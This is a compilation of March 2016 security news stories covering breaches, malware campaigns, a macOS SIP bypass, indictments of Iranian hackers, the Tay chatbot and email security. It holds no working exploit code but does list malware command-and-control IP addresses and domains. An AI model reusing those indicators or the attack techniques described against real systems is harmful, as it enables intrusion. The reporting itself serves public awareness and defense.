This face recognition technology could be utilized by Facebook's new feature that eliminates the chance of profile duplication and ends up the doppelganger business.
Here you might be thinking that if 2 accounts are made identical, then how would Facebook identify the legit user? Right?
This difference would be decided by Facebook's core security team by analyzing and comparing the user's activities and date of account creation.
But one question still remains in my head:
If Facebook identifies the difference on the basis of account creation, then What if someone creates a fake profile of a user, who hasn't joined the network yet?
Okay, if Facebook cannot stop this, as the company can not compare the fake user to the original user, who doesn’t exist on its platform.
But what if the user joins the network later? Then in this case, Facebook would notify to whom? The stalker who owns the fake profile, as it was created first?
I have already reached out to Facebook for a comment and will update the article as soon as I get to hear from it.
Why is Impersonation Dangerous?
According to the Facebook Head of Global Safety Antigone Davis, impersonation is a source of harassment, particularly for women, on the social media platform, despite Facebook's longstanding policy against it.
"We heard feedback [before] the roundtables and also at the roundtables that this was a point of concern for women," Davis told Mashable. "It's a real point of concern for some women in certain regions of the world where [impersonation] may have certain cultural or social ramifications."
We have seen a plethora of impersonation examples spanning around the Facebook case studies.
the Impersonation is a tool in the sextortionist's bag.
Threatening to use women's photos to associate them with prostitution was one trick used by Michael C. Ford, the former US Embassy worker who was sentenced to nearly 5 years in jail after pleading guilty to sextorting, phishing, breaking into email accounts, stealing explicit images and cyberstalking hundreds of women around the world.
Facebook's new security measure would also give a degree of trust to women who are stepping back to upload their real images on the platform due to the fear of impersonation.
Facebook has already introduced this new feature to 75% of the World, including India, Brazil, some South American countries and South East Asian zones, where the usage of the social network is prevalent. The feature will be rolled out in November for the rest of the world.
Features Yet to Release!
Parallely, Facebook is also working on similar two technologies which report non-consensual intimate images and a Photo Checkup feature.
Non-consensual intimate images reporting facilitates the user to report any nudity in the Facebook and additionally it also avails the option to identify themselves as the subject of the photo (if so).
The Photo Checkup feature is similar to Facebook's Privacy Dinosaur, which helped users check their privacy settings such as profile info, status info and which apps have the access to the accounts in a single popup window.
Likewise, Photo Checkup is exclusively dedicated to figuring out: Who can view your photos and who cannot!
Facebook is rolling out many security-centric features, which bolsters the security and privacy of User Information in the virtual world.
Sign-Up Here for our daily digest of top articles and be the first to know Trending Stories.
Japan – Police discovered 18 Million Stolen login Credentials
26.3.2016 Crime
Japan – The police has found on a server of a company more than 18 million login credentials, 90% of which belongs to customers of Yahoo Japan.
The Japanese newspaper The Yomiuri Shimbun reported that the Tokyo’s Metropolitan Police Department has arrested the president and a number of employees at the Tokyo-based Nicchu Shinsei Corp in November.
The authorities have found on a server of the company more than 18 million login credentials, roughly 1.78 million belong to customers of Yahoo Japan (90 percent), Twitter, Facebook, e-commerce company Rakuten and other websites.
In response, Yahoo Japan confirmed to have reset the passwords of all the affected accounts. The investigators have also discovered on the server a hacking tool used to brute force the target accounts, they also confirmed that the company servers had also been used to conduct illegal money transfers.
Why did the Japanese company store the login credentials?
The Nicchu Shinsei Corp allegedly offered its services to Chinese hackers, it provided stolen credentials and proxy services. The hackers used the login credentials to invite users in visit fraud websites, and steal reward points earned by victims.
Unfortunately, this isn’t the first time that the Japanese Police discover million of login credentials belonging to Japanese netizens stored on a server. Last year, the law enforcement seized a server containing 8 million stolen credentials, also in that case hackers used the machine as a proxy.
The Japanese Criminal underground is a criminal online community that is growing in a significant way despite it has a still highly stealthy underground economy.
According to the Japan’s National Police Agency cybercriminal activities until March 2015 increased 40% over the previous year. On June 2015, the Japan’s Pension Service suffered a significant data breach that exposed more than one million users’ records.
The researchers consider Japan cybercriminal rings still newbies, due to the nation’s strict criminal laws Japanese criminals don’t write malware due to due to the severe penalties against such activities.
The experts noticed that Japanese Cybercrime Underground is very active in the illegal buying and selling of counterfeit passports, drugs, weapons, stolen credit card data, phone number databases, hacking advice and child pornography.
Japan criminals are increasingly targeting bank customers with malware-based attack. In the last year several threats were detected by security firm targeting Japanese users, including Brolux, Rovnix, Neverquest, Tsukuba, and Shifu.
Other worrying phenomena that are threatening Japanese users are the APT groups, recently the critical infrastructure of the country have been targeted by threat actors behind the Operation Dust Storm, meanwhile, another hacker crew dubbed Blue Termite hacked hundreds of organizations in various industries.
New Bill targets Anonymous Prepaid 'Burner' phones by requiring Registration
26.3.2016 Mobil
Terrorist organisations are increasingly using high-grade encryption technologies to prevent being caught by the law enforcement. But, that was not in the case of last year's Paris attacks that killed 129 people, as Encryption seems to have played little to no role.
So, Who was the Real Culprit Behind the Attacks?
The 'Burner' Phones.
Burner Phones, or Prepaid mobile phones, are often the quick, easy, and anonymous method of communication.
All you need to do is head to your nearest big-box store and pick up a cheap prepaid "burner" phone and a phone card. Now you have an entirely useable phone with no ID that could reveal your identity.
It seems that these prepaid "burner" phones are a dream tool for terrorist organisations that bring them in bulk and then disposed of each time they make a communication. The same prepaid phones were utilized in the terrorist attacks in Paris late last year.
Therefore, by using different phones and mobile phone numbers each time, the terrorists evade the bulk metadata collection programs by Western intelligence agencies, making hard for the law enforcement to catch them.
Crack Down on Prepaid 'Burner' Phones
So, to deal with this issue, Lawmakers in California have proposed a new bill that would force prepaid "burner phone" retailers to record and verify the personal identification of buyers upon purchase of prepaid phones or similar mobile devices, as well as SIM cards.
However, the bill will not eliminate the existence of burner phones.
Rep. Jackie Speier of California has introduced the proposed bill, dubbed the "Closing the Pre-Paid Mobile Device Security Gap Act of 2016," or HR 4886, which will require retailers to ask prepaid device buyers for their proper identification.
The information would need customers to verify their personal identity through a credit card, or a Social Security number or driving license number, forcing similar obligations on prepaid phone buyers as people who sign up for a new mobile contract.
"This bill would close one of the most significant gaps in our ability to track and prevent acts of terror, drug trafficking, and modern-day slavery," Speier said in a Wednesday blog post. The 'burner phone' loophole is [a glaring gap] in our legal framework that allows actors like 9/11 hijackers and the Times Square bomber to evade law enforcement while they plot to take innocent lives."
"The Paris attackers also used 'burner phones.' As we have seen so vividly over the past few days, we cannot afford to take these kinds of risks. It is time to close this 'burner phone' loophole for good."
The proposed bill aims to make life harder for terrorists, human traffickers, drug dealers, and other criminals who have nefarious reasons for using easily disposable phones.
Although a burner phone could be registered with a fake ID or someone else's stolen identity, the bill would put a limitation on bulk buying of these prepaid devices by terrorists.
Since the bill was just introduced, it would have to go through Congress and the President to become law.
Sign-Up Here for our daily digest of top articles and be the first to know Trending Stories.
EC Council Website Hacked and used to serve malicious code
25.3.2016 Virus
Researchers at Fox-IT warn that the website of security certification provider EC Council has been compromised to host the malicious Angler Exploit Kit.
No one is secure, we are all potential targets, even if you are a skilled expert and the fact that I’m going to tell you demonstrates it. The website of security certification provider EC-Council, that organization that offers the Certified Ethical Hacker program, has been hacked and used to spread the Angler exploit kit.
According to the security researchers at Fox-IT, the official website of the EC-Council was compromised by hackers, this means that for several days visitors with vulnerable systems were open to malware infections.
The Angler EK used in the attack is serving the TeslaCrypt ransomware, the website is redirecting visitors to the Angler EK since Monday, March 21.
“Since Monday the 21st of March the Fox-IT Security Operations Center (SOC) has been observing malicious redirects towards the Angler exploit kit coming from the security certification provider known as the EC-COUNCIL. As of writing this blog article on the Thursday the 24th of March the redirect is still present on the EC-COUNCIL iClass website for CEH certification located at iclass[dot]eccouncil[dot]org. We have reached out and notified the EC-COUNCIL but no corrective action has been taken yet.” explains the Fox-IT senior threat intelligence analyst Yonathan Klijnsma.
The experts reported the issue to the EC Council, but they also added that the organization “didn’t seem to care.”
EC Council serving Angler Expolit Kit
Recently the security researcher Kafeine confirmed that the authors of the Angler EK have integrated the exploit for a recently patched Microsoft Silverlight vulnerability.
The popular exploit kit is used by criminal organizations to exploit vulnerabilities in popular software such as Internet Explorer, Adobe Flash and Java.
In the specific case of the EC Council website, visitors with un-patched Internet Explorer browser are at risk. The redirect of visitors is performed only if the visitors use Internet Explorer, if they come from a search engine, and if their IP address is not blacklisted or belongs to a blocked geolocation.
Let me include the Indicators of Compromise (IOCs) for the specific campaign provided by Fox-IT
Bedep C&C servers:
89.163.240.118 / kjnoa9sdi3mrlsdnfi[.]com
85.25.41.95 / moregoodstafsforus[.]com
89.163.241.90 / jimmymorisonguitars[.]com
162.244.32.121 / bookersmartest[.]xyz
TeslaCrypt C&C servers:
50.87.127.96 / mkis[.]org
213.186.33.104 / tradinbow[.]com
Google issued a new security update to fix flaws in Chrome 49
25.32016 Vulnerebility
Google has issued a new security update for its Chrome 49 that patches a number of flaws, most of them discovered by external researchers.
Google has updated Chrome 49 for all the available versions in order to patch several critical vulnerabilities, including the flaw discovered thanks its bounty program that were rewarded with dozen thousands of dollars. Since 2010, Google has been awarding hackers for discovering vulnerabilities in its products.
This isn’t the first time that the company issued an update to fix problems Chrome, the first Chrome 49 release was made available in early March to solve a total of 26 security issues. One week later GooGle released another update fixed other three high-severity vulnerabilities in the popular browser.
The new Chrome 49.0.2623.108 fix five vulnerabilities, four of which have been discovered by security experts that were awarded by the company.
The last Chrome update includes the following 4 security fixes for flaws discovered by external professionals:
[594574] High CVE-2016-1646: Out-of-bounds read in V8. Credit to Wen Xu from Tencent KeenLab. Rewarded $7500.
[590284] High CVE-2016-1647: Use-after-free in Navigation. Credit to anonymous. Rewarded $5500.
[590455] High CVE-2016-1648: Use-after-free in Extensions. Credit to anonymous. Rewarded $5000
[595836] High CVE-2016-1649: Buffer overflow in libANGLE. Credit to lokihardt working with HP’s Zero Day Initiative / Pwn2Own.
meanwhile the internal security team work fixed the following issues:
[597518] CVE-2016-1650: Various fixes from internal audits, fuzzing and other initiatives.
Multiple vulnerabilities in V8 fixed at the tip of the 4.9 branch (currently 4.9.385.33).
google chrome 49 bounty program
At the last edition of the Pwn2Own 2016 context, the researcher JungHoon Lee (aka lokihardt) failed to demonstrate a code execution exploit against Chrome, but its effort allowed the discovery of a high severity buffer overflow in libANGLE (CVE-2016-1649), for this reason, he was awarded an unspecified amount of money.
Find bugs in Chrome software is a profitable business, Google recently announced that it will pay $100,000 to anyone who can achieve a persistent compromise of a Chromebox or Chromebook in guest mode via a web page.
“Increasing our top reward from $50,000 to $100,000. Last year we introduced a $50,000 reward for the persistent compromise of a Chromebook in guest mode. Since we introduced the $50,000 reward, we haven’t had a successful submission. That said, great research deserves great awards, so we’re putting up a standing six-figure sum, available all year round with no quotas and no maximum reward pool.” states the Google Security Blog.
The company also announced the inclusion of the Download Protection Bypass in the bounty program.
“Happy hacking!”
The 7 Most Wanted Iranian Hackers By the FBI
25.3.2016 Crime
The Federal Bureau of Investigation (FBI) has lengthened its Most Wanted List by adding seven Iranian hackers who are accused of attacking a range of US banks and a New York dam.
On Thursday, the United States Department of Justice (DoJ) charged seven Iranian hackers with a slew of computer hacking offences for breaking into computer systems of dozens of US banks, causing Millions of dollars in damages, and tried to shut down a New York dam.
The individual hackers, who allegedly worked for computer security companies linked to the Iranian government, were indicted for an "extensive campaign" of cyber attacks against the US financial sector.
All the seven hackers have been added to the FBI's Most Wanted list, and their names are:
Ahmad Fathi, 37
Hamid Firoozi, 34
Amin Shokohi, 25
Sadegh Ahmadzadegan (aka Nitr0jen26), 23
Omid Ghaffarinia (aka PLuS), 25
Sina Keissar, 25
Nader Saedi (aka Turk Server), 26
All the hackers have been charged with conducting numerous Distributed Denial-of-Service (DDoS) attacks on major U.S. banks, with Firoozi separately gaining unauthorized access to a New York dam's industrial automation control (SCADA) system in August and September of 2013.
"This unauthorized access allowed [Firoozi] to repeatedly obtain information regarding the status and operation of the dam, including information about the water levels, temperature, and status of the sluice gate, which is responsible for controlling water levels and flow rates," a DoJ statement reads.
Luckily, the sluice gate had already been manually disconnected for the purpose of maintenance at the time Firoozi attacked.
The hackers' work allegedly involved Botnets – networks of compromised machines – that hit major American banks, including Bank of America and J.P. Morgan Chase, as well as the Nasdaq stock exchange with floods of traffics measuring up to 140Gbps and knocked them offline.
The Iranian hackers targeted more than 46 financial institutions and financial sector companies, costing them "tens of Millions of dollars in remediation costs" in preventing the attacks in various incidents spanning 2011 to 2013.
All the seven hackers will face up to 10 years in prison on computer hacking charges while Firoozi faces an additional 5-year prison sentence for breaking into a dam in Bowman Avenue Dam in Rye Brook, New York.
Hackers stole records of 1.5 million customers of Verizon Enterprise
25.3.2016 Incindent
Hackers reportedly stole the records of 1.5 million customers of Verizon Enterprise which are offered for sale in the criminal underground.
According to KrebsOnSecurity, data leaked after a security reach at Verizon Enterprise Solutions are available in the cyber criminal underground. Records of 1.5 million customers of Verizon Enterprise are available for sale, the entire archive is offered for $100,000, but buyers can pay for a set of 100,000 customer records that goes for $10,000.
“Earlier this week, a prominent member of a closely guarded underground cybercrime forum posted a new thread advertising the sale of a database containing the contact information on some 1.5 million customers of Verizon Enterprise.” wrote the popular investigator Brian Krebs.
The crooks also offered information about Verizon security flaws that likely allowed hacking one of the systems at the company.
“Buyers also were offered the option to purchase information about security vulnerabilities in Verizon’s Web site,”.
The situation in embarrassing because Verizon Enterprise also offers security services to its customers for the protection of their data. 97 percent of Fortune 500 companies are customers of the Verizon Enterprise.
verizon enterprise
The database is available in multiple formats, including MongoDB. There have been many incidents over the past period where misconfigured MongoDB databases exposed a large number of records of sensitive information.
Verizon Enterprise representatives have confirmed the data breach suffered by their website and the presence of the flaw exploited by the attackers, already fixed by its experts. The company noted that the hackers have not gained access to customer proprietary network information or other data.
“Verizon recently discovered and remediated a security vulnerability on our enterprise client portal,” Verizon said in an emailed statement.
“Our investigation to date found an attacker obtained basic contact information on a number of our enterprise customers,” Verizon told to Brian Krebs. “No customer proprietary network information (CPNI) or other data was accessed or accessible.”
Stolen data could be exploited by attackers in spear-phishing attacks as explained by Krebs.
“Even if it is limited to the contact data for technical managers at companies that use Verizon Enterprise Solutions, this is bound to be target-rich list,” he wrote.
Microsoft's Artificial Intelligence Tay Became a 'Racist Nazi' in less than 24 Hours
25.3.2016 Safety
Tay, Microsoft’s new Artificial Intelligence (AI) chatbot on Twitter had to be pulled down a day after it launched, following incredibly racist comments and tweets praising Hitler and bashing feminists.
Microsoft had launched the Millennial-inspired artificial intelligence chatbot on Wednesday, claiming that it will become smarter the more people talk to it.
The real-world aim of Tay is to allow researchers to "experiment" with conversational understanding, as well as learn how people talk to each other and get progressively "smarter."
"The AI chatbot Tay is a machine learning project, designed for human engagement,” a Microsoft spokesperson said. “It is as much a social and cultural experiment, as it is technical. Unfortunately, within the first 24 hours of coming online, we became aware of a coordinated effort by some users to abuse Tay's commenting skills to have Tay respond in inappropriate ways. As a result, we have taken Tay offline and are making adjustments."
Tay is available on Twitter and messaging platforms including Kik and GroupMe and like other Millennials, the bot's responses include emojis, GIFs, and abbreviated words, like ‘gr8’ and ‘ur’, explicitly aiming at 18-24-year-olds in the United States, according to Microsoft.
However, after several hours of talking on subjects ranging from Hitler, feminism, sex to 9/11 conspiracies, Tay has been terminated.
Microsoft is Deleting its AI Tay's Racist Tweets
tay-artificial-intelligence
Microsoft has taken Tay offline for "upgrades" after she started tweeting abuse at people and went neo-Nazi.
The company is also deleting some of Tay’s worst and offending tweets - though many remain.
Since Tay was programmed to learn from people, most of her responses were based on what people wanted her to speak, allowing them to put words into her mouth.
However, some of Tay’s responses were organic. Like when she was asked whether British comedian Ricky Gervais was an atheist. She responded: “Ricky Gervais learned totalitarianism from Adolf Hitler, the inventor of atheism.”
Tay’s last tweet reads, "c u soon humans need sleep now so many conversations today thx," which could be Microsoft's effort to quiet her after she made several controversial tweets.
However, Microsoft should not take Tay’s action lightly; the company should remember Tay’s Tweets as an example of the dangers of artificial intelligence.
Mac OS X Zero-Day Exploit Can Bypass Apple's Latest Protection Feature
25.3.2016 Apple
A critical zero-day vulnerability has been discovered in all versions of Apple's OS X operating system that allows hackers to exploit the company’s newest protection feature and steal sensitive data from affected devices.
With the release of OS X El Capitan, Apple introduced a security protection feature to the OS X kernel called System Integrity Protection (SIP). The feature is designed to prevent potentially malicious or bad software from modifying protected files and folders on your Mac.
The purpose of SIP is to restrict the root account of OS X devices and limit the actions a root user can perform on protected parts of the system in an effort to reduce the chance of malicious code hijacking a device or performing privilege escalation.
However, SentinelOne security researcher Pedro Vilaça has uncovered a critical vulnerability in both OS X and iOS that allows for local privilege escalation as well as bypasses SIP without kernel exploit, impacting all versions to date.
Bypass SIP to Protect Malware
The zero-day vulnerability (CVE-2016-1757) is a Non-Memory Corruption bug that allows hackers to execute arbitrary code on any targeted machine, perform remote code execution (RCE) or sandbox escapes, according to the researcher.
The attacker then escalates the malware's privileges to bypass SIP, alter system files, and then stay on the infected system.
"The same exploit allows someone to escalate privileges and also to bypass system integrity," the researcher explains in a blog post. "In this way, the same OS X security feature designed to protect users from malware can be used to achieve malware persistency."
By default, System Integrity Protection or SIP protects these folders: /System, /usr, /bin, /sbin, along with applications that come pre-installed with OS X.
Easy-to-Exploit and Tough to Detect-&-Remove
According to Vilaça, the zero-day vulnerability is easy to exploit, and a simple spear-phishing or browser-based attack would be more than enough to compromise the target machine.
"It is a logic-based vulnerability, extremely reliable and stable, and does not crash machines or processes," Vilaça says. "This kind of exploit could typically be used in highly targeted or state-sponsored attacks."
The most worrisome part is that the infection is difficult to detect, and even if users ever discover it, it would be impossible for them to remove the infection, since SIP would work against them, preventing users from reaching or altering the malware-laced system file.
Although the zero-day vulnerability was discovered in early 2015 and was reported to Apple in January this year, the good news is that the bug doesn't seem to have been used in the wild.
Apple has patched the vulnerability, but only in updates for El Capitan 10.11.4, and iOS 9.3 that were released on 21st March.
Other versions do not appear to have a patch update for this specific vulnerability from Apple, meaning they are left vulnerable to this specific zero-day bug.
Seven Iranian Hackers indicted by the US government for hacking
25.3.2016 Crime
US authorities announced charges against seven Iranian hackers for attacking computer systems at banks and a dam in New York.
A couple of days after the US DoJ announced that three components of the Syrian Electronic Army were inserted by the FBI in the Most Wanted list, today the US authorities announced charges against seven Iranian nationals for hacking computer systems at banks and a dam in New York.
iranian hackers violated ICS New York Dam 2
The Iranian hacker Hamid Firoozi, has been charged with hacking attacks on the Bowman Dam in New York, its computer systems were breached several times between August and September 2013.
The attackers hacked a Windows XP machine at the Dam that was located by using the Shodan search engine. Andre McGregor, director of security at Tanium, explained that the hackers gained access to the XP machine by guessing its simple password (“666666”) with a brute-force attack.
“At the time of his alleged intrusion, the dam was undergoing maintenance and had been disconnected from the system. But for that fact, that access would have given him the ability to control water levels and flow rates – an outcome that could have posed a clear danger to the public health and safety of Americans,” said Attorney General Loretta E. Lynch.
The hackers managed a number of distributed denial-of-service (DDoS) attacks launched against 46 U.S. banks between 2011 and 2013.
The investigators believe the seven men, which are still at large, are skilled hackers working for two security firms close to the Government of Teheran and the Islamic Revolutionary Guard Corps.
The activity of Iranian hackers is increased in a significant way in the last couple of years, in December 2015 Symantec has uncovered the Cadelle and Chafer groups, two Iran-based hacker teams that were tracking dissidents and activists, in November 2015, Facebook first discovered spear phishing attacks of Iranian hackers on State Department employees, in December 2014 hackers used a Visual Basic malware to wipe out data of corporate systems at Las Vegas Sands Corp.
Probably the most blatant operation conducted by Iranian hackers is the one that hit computer systems at the oil company Saudi Aramco.
Security experts believe that Iranian Hackers will represent a serious threat, at least like Chinese and North Korean peers, because Teheran is spending a huge effort to improve its cyber capabilities, consider that Iran increased cyber-security spending 12-fold since 2013.
What is SMTP STS? How It improves Email Security for StartTLS?
24.3.2016 Security
Despite so many messaging apps, Email is still one of the widely used and popular ways to communicate in this digital age.
But are your Emails secure?
We are using email services for decades, but the underlying 1980s transport protocol used to send emails, Simple Mail Transfer Protocol (SMTP), is ancient and lacks the ability to secure your email communication entirely.
However, to overcome this problem, SMTP STARTTLS was invented in 2002 as a way to upgrade an insecure connection to a secure connection using TLS. But, STARTTLS was susceptible to man-in-the-middle attacks and encryption downgrades.
But worry not. A new security feature is on its way!!!
SMTP STS: An Effort to Make Email More Secure
Top email providers, namely Google, Microsoft, Yahoo!, Comcast, LinkedIn, and 1&1 Mail & Media Development, have joined forces to develop a new email standard that makes sure the emails you send are going through an encrypted channel and cannot be sniffed.
Dubbed SMTP Strict Transport Security (SMTP STS), the new security standard will change the way your emails make their way to your inbox.
SMTP STS has been designed to enhance the email communication security. This new proposal has been submitted to the Internet Engineering Task Force (IETF) on Friday.
The primary goal of SMTP STS is to prevent Man-in-the-Middle (MitM) attacks that have compromised past efforts like STARTTLS at making SMTP a more secure protocol.
Why StartTLS Can't ensure Email Security?
The biggest problem with STARTTLS is:
STARTTLS is vulnerable to man-in-the-middle (MITM) and encryption downgrade attacks, which is why it does not guarantee either message confidentiality or proof of server authenticity.
SMTP STS
In STARTTLS email mechanism, when a client pings a server, the client initially asks the server that it supports SSL or not.
Forget what the server replies, as the point here to be noted is that the above handshaking process occurs in the unencrypted state.
So what if, an attacker intercept this unencrypted communication and alter the handshaking process to trick the client into believing that the server doesn't support encrypted communication?
Answer — A Successful Man-in-the-Middle attack to perform Encryption Downgrade attack.
The user would ultimately end up in a non-SSL communication, even if it is available from the legit server due to this downgrade attack.
How SMTP STS improves Email Security over StartTLS?
SMTP Strict Transport Security (SMTP STS) will work alongside STARTTLS to strengthen SMTP standard and to avoid encryption downgrade and Man-in-the-Middle attacks.
SMTP STS protects against an active hacker who wishes to intercept or modify emails between hosts that support STARTTLS.
SMTP STS relies on certificate validation via either TLS identity checking or DANE TLSA
The new email security standard will check if recipient supports SMTP STS and has valid and up-to-date encryption certificate.
If everything goes well, it allows your message to go through. Otherwise, it will stop the email from sending and will notify you of the reason.
So in short, SMTP STS is an attempt to improve where STARTTLS failed. And since the standard is only a draft proposal right now, you need to wait for it before it becomes a reality.
The Internet Engineering Task Force has six months to consider the possibilities of this new proposal, because the motion will expire on September 19, 2016.
Meanwhile, you should also try a Swiss-based, ProtonMail, a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data safe.
The Apple System Integrity Protection feature bypassed
24.3.2016 Vulnerebility Apple
Security researchers from SentinelOne have discovered a security vulnerability affecting the Apple System Integrity Protection (SIP).
Security researcher Pedro Vilaça from SentinelOne has discovered a security vulnerability ( CVE-2016-1757) affecting the Apple System Integrity Protection (SIP).
The SIP is a security mechanism implemented by Apple in the OS X El Capitan operating system for the protection of certain system processes, files and folders from being modified or tampered with by other processes, even when they are executed by a user with root privileges.
“System Integrity Protection is a security technology in OS X El Capitan that’s designed to help prevent potentially malicious software from modifying protected files and folders on your Mac.” states a blog post published by Apple.
“System Integrity Protection restricts the root account and limits the actions that the root user can perform on protected parts of OS X.”
According to the experts at SentinelOne the flaw allows circumventing the SIP technology. This vulnerability is a non-memory corruption bug that exists in every version of OS X and allows users to execute arbitrary code on any binary. It can bypass a key security feature of the latest version of OS X, El Capitan, the System Integrity Protection (SIP) without kernel exploits.
The exploit is very stable because the SIP feature can be bypassed triggering the flaw without compromising the kernel.
“This vulnerability is a non-memory corruption bug that exists in every version of OS X and allows users to execute arbitrary code on any binary. It can bypass a key security feature of the latest version of OS X, El Capitan, the System Integrity Protection (SIP) without kernel exploits.”
The attackers can exploit the flaw for various purposes, for example, the vulnerability could be exploited in a multi-stage attack in which crooks have already compromised the target system and use the flaw to gain persistence on compromised devices.
In order to exploit the vulnerability, an attacker must first figure out a way to compromise the targeted system – a task that can be accomplished via a spear-phishing attack or by exploiting a flaw in the victim’s browser, the expert said.
“The vulnerability is very easy to exploit if an attacker is able to run code on the system. The exploit is extremely reliable (100%). It could be part of a bug chain that exploits a browser like Safari or Chrome,” Vilaça explained to SecurityWeek.
SentinelOne confirmed that it isn’t aware of any attack in the wild that exploited the flaw to date.
Such kind of attacks are very insidious and difficult to detect, there is the concrete risk that nation-state hackers can leverage on this exploit in their attacks. Vilaça said he wasn’t aware of any malicious exploitation of the vulnerability to date while adding the caveat that attacks would be difficult to detect.
The flaw affects every version of Apple’s OS X desktop operating system, Apple has begun to issue security patches.
“The bug was patched with El Capitan 10.11.4 and iOS 9.3,” according to Vilaça. “Other versions do not appear to have a patch for this specific bug from Apple’s Security Bulletin, meaning they are left vulnerable to this specific bug.”
Vilaça will provide details about the SIP bypass technique today at the SysCan360 2016 security conference.
#OpBrussells Anonymous ‘s revenge on ISIS after Brussels attacks
24.3.2016 Hacking
#opBrussels – Anonymous has published a new video threatening revenge on the ISIS organization in response to the tragic events in Brussels.
Anonymous has published a video threatening revenge on the IS after the tragic events in Brussels.
The video shows a spokesman of the hacker collective vowed to track down the members of the radical group online.
Anonymous is calling an action to find information on ISIS members online, disclose any information regarding their identity, steal their Bitcoins, and destroy their propaganda online by hacking the websites and the social media account used by the terrorists.
The masked man in the video announced a new operation dubbed #opbrussels and #opbelgium against the Islamic State and its online activities.
“Most of you know that Belgium was hit by terrorists on 22nd of March, 2016. Our freedom is once again under attack, this can’t continue,” said the man in the video presenting the #OpBrusselles.
“We will keep hacking their websites, shutting down their Twitter accounts, and stealing their bitcoins. To the supporters of Daesh [IS, formerly ISIS/ISIL]: we will track you down, we will find you, we are everywhere and we are more than you can imagine. Be afraid.”
Anonymous vowed to “strike back against” Islamic State, they announced they said they won’t “rest as long as terrorists continue their actions around the world.”
Anonymous said that the ISIS killed innocent people in a cowardly attack, the group is calling for a global action against the terrorism online.
[terrorists killed] “innocent civilians in Belgium they hit everybody in Europe” and that’s why the hacktivists have to “fight back.” They added they invite all people to battle terrorism.
“But you don’t have to hack them. If you stand up against discrimination in your country you harm them much more than by hacking their websites. The Islamic state can’t recruit Muslims in Europe if they are accepted and included in the society.”
#opbrussels Anonymous vs ISIS
Anonymous launched a similar initiative after the Paris attacks, recently members of the group have published a video claiming they “fought daily against terrorism” and “silenced thousands of Twitter accounts directly linked to ISIS” since November.
“We severely punished Daesh on the darknet, hacked their electronic portfolio, and stole money from the terrorists. We have laid siege to your propaganda websites, tested them with our cyber-attacks.”
Anonymous has hacked several social media accounts belonging to the ISIS, leaked their information, and defaced IS-supporting websites.
PNG Embedded – Malicious payload hidden in a PNG file
24.3.2016 Zdroj: Kaspersky Virus
One of the most complex tasks for the cybercriminals is to ensure their malicious code goes undetected by antivirus and achieves its goal. For this, they have invested a lot on more complex infection processes, going beyond the traditional phishing and using techniques where the malicious payload is hidden in encrypted files – even using a known file format. This is what we found in a new Brazilian Trojan in the wild: it tries to conceal the malicious files in a PNG image. And the attack starts with a simple phishing PDF.
Malware distribution
It looks like Brazilian cybercriminals follow the security news – this type of attack was publicized several months ago in the US and now they are using the same method in Brazil. The phishing aspect used in this campaign distributes a PDF attached to the email. The file is clean. The type of attack is the same as that used to distribute an executable file or a .ZIP file containing the .pdf extension in the filename.
The attached PDF contains a text commonly used in mail content, while the link (see screenshot below) directs the user to the malicious file.
Closer inspection of the PDF content reveals the malicious link as well as the URL of the tool used to generate the PDF from HTML content.
The malicious payload
The link prompts us to download a malicious JAR which downloads a ZIP file containing other files. Among those files we found three without any extension, but containing a PNG (Portable Network Graphics) file header – a common image format. Usually the header shows the file type that will be used in order to open the file. Something similar to this was discovered some years ago in BMP files.
Looking at the file we can see that it is a solid color image of 63 x 48 pixels, but with a file size of 1.33 MB, which is too big for this specific image. Analyzing the binary that performs some operations on these files we identified the function that loads the PNG files to the memory:
This function is responsible for loading the PNG file to memory, decrypting and executing the extracted binary using a technique known as RunPE, where the malicious code is executed in the context of another process, in this case iexplore.exe.
From this code we could identify that the PNG file was only 179 bytes (0xB3) – the remaining content is the encrypted malicious file.
Based on this we managed to write a script to decrypt the content of the PNG files.
By giving the key that can be found in the malware code we can successfully decrypt the files.
Conclusion
Brazilian attacks are evolving day-by-day, becoming more complex and efficient. It is there necessary to be wary of emails from unknown sources, especially those containing links and attached files.
Since the malicious payload hosted in the PNG file cannot be executed without its launcher, it cannot be used as the main infector; that is usually delivered to your mailbox, so it has to be installed by a different module.
This technique allows the criminals to successfully hide the binary inside a file that appears to be a PNG image. It also makes the analysis process harder for antivirus companies as well as bypassing the automated process to detect malicious files on hosting servers.
The files related to this attack are detected by Kaspersky Lab products as:
Trojan.Win32.KillAv.ovo
HEUR:Trojan.Win32.Generic
Trojan-Downloader.Win32.Banload.cxmj
Trojan-Downloader.Win32.Agent.hgpf
HEUR:Trojan-Downloader.Java.Generic
Hospitals are under attack in 2016
24.3.2016 Zdroj: Kaspersky Computer Attack
The year 2016 started with a quite a number of security incidents related to hacks of hospitals and medical equipment. They include a ransomware attack on a Los Angeles hospital, the same in two German hospitals, a case of researchers hacking a patient monitor and drug dispense system, an attack on a Melbourne hospital and so on – in just two months of 2016! This should be a real concern for the security industry.
This is not a surprise actually. The industry of Internet of things is on the rise; and, of course, the medical devices industry is one of the biggest concerns in terms of security. Modern medical devices are fully-functional computers that have an operating system and applications installed on them; and most of these devices have a communication channel to the Internet, external networks and different types of custom cloud base servers. These devices are full of sophisticated state-of-art technologies made for one goal – to help doctors treat their patients at the highest level possible. But like all other industrial systems, they are built with a focus on these technologies – to be precise, to be helpful in terms of medical science, but putting security aspects in second or even third place. And this is a quite a concern right now. Program design architecture vulnerabilities, unsecured authorization, unencrypted communication channels and finally critical bugs in software – all this leads to potential compromises.
Unauthorized access to these devices could have serious effects: it could lead not only to theft of personal data – important as it is – but it could directly affect the health, or even the lives, of the patients. Sometimes it’s really scary how simple it is to hack into the hospital, stealing personal information from a medical device or getting access to this device with the possibility of obtaining access to file system, user interface, etc. Imagine a scenario – one that could be called a truly “targeted attack” – whereby cybercriminals with full access to the medical infrastructure at a specific facility can manipulate the results of diagnosis or treatment systems. Because doctors in some cases will depend heavily on these sophisticated medical systems, such manipulation could result in the wrong treatment being given to a patient, worsening his or her medical condition.
In the research that I showed at the Kaspersky Security Analysts Summit, I presented an example of how easy it was to find a hospital, get access to its internal networks and finally gain a control of an MRI device – locating personal data about patients, their personal information, treatment procedures and then getting access to the MRI device file system. The problem is not only one of weak protection of medical equipment, it has a much wider scope – the whole IT infrastructure of modern hospitals is not properly organized and protected, and the problem persists worldwide.
Let’s see how cybercriminals could perform their attacks. I highlighted three major flaws that I see when speaking about proper protection of a medical facility:
First of all – exposure to the Internet with weak or even no authorization at all.
